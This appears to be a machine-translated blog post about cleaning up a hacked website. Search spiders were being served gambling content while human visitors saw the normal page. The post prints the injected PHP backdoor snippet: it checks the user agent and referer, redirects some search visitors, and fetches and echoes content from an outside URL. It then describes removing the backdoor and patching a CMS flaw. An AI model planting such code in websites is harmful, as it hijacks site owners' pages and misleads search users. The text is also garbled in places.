Resolving site snapshots does not match the actual content of the site

Source: Internet
Author: User

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

The day before yesterday, QQ received a friend sent a message, asked me, I look at the entrepreneurial park when the friend, chatted up, his company's client's website was invaded

But he and I said that his client's website is not this kind of, and this has nothing to do with this, I opened the domain name to see the actual content is

is a commercial website, at this time my idea is very clear, first of all can be sure that the content of the spider is not the same, this is commonly used black hat technique, so you can get a lot of outside the chain, in order to further confirm my thinking, I decided to use Spider Simulator test results as follows:

Sure enough and I think the same, which proves my guess, this is usually in the site root directory to add a malformed file, so that the malformed file can not be deleted

And the priority is higher than the site itself, or the default file in the Web site to add a piece of code to call his file, to determine whether the person or spider

If it is a spider to show it the content of gambling, if it is a person to display the normal page, in the FTP account password for a step check,

It was my second trick to add the following PHP code to the file

  

$file = "http://www.***.com/seo/3.html";

$referer =$_server["Http_referer"];

$agent = Strtolower ($_server["http_user_agent"]);

if (Strstr ($referer, "Baidu") &&strstr ($referer, "456"))

{

Header ("Location: $url");

}

if (Ereg ("http://www.baidu.com/search/spider.htm", $agent))

{

$content =file_get_contents ($file);

Echo $content;

Exit;

}

? >

< PHP

This code to understand a look at it, I do not explain, in the root directory also found an encrypted file, that file seems to be a gambling web content, named Index.asp.asp next is to replace the index.php file and then delete the relevant back door, patched,

But when I get the website backstage the account password time I crashed, the password unexpectedly is the default, the account number is also the default, the procedure is Dede existence security flaw

Patch vulnerability with Dede Security Detection Tool a little check the Trojan horse and Webshell no extra found, patched up, and then use Spider Simulator to view

  

Web content and spider crawling content consistent with the next is @ Spider let spiders come crawling and update snapshots what how @ Spider? Aren't you?

Then I won't, hey!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.